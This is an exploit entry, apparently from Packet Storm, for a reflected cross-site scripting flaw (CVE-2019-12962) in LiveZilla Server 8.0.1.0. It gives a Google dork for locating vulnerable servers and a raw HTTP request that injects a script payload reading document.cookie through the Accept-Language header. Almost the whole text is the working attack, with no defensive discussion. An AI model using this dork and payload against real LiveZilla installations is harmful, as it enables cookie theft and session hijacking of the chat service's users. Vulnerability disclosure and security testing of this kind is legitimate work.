LiveZilla Server 8.0.1.0 Cross Site Scripting

2021-03-19T00:00:00
ID PACKETSTORM:161867
Type packetstorm
Reporter Clement Cruchet
Modified 2021-03-19T00:00:00

Description

                                        
                                            `# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS  
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla  
# Date: 18 Mars 2021  
# Exploit Author: Clément Cruchet  
# Vendor Homepage: https://www.livezilla.net  
# Software Link: https://www.livezilla.net/downloads/en/  
# Version: LiveZilla Server 8.0.1.0 and before  
# Tested on: Windows/Linux  
# CVE : CVE-2019-12962  
  
GET /mobile/index.php HTTP/1.1  
Host: chat.website.com  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: ';alert(document.cookie)//  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
`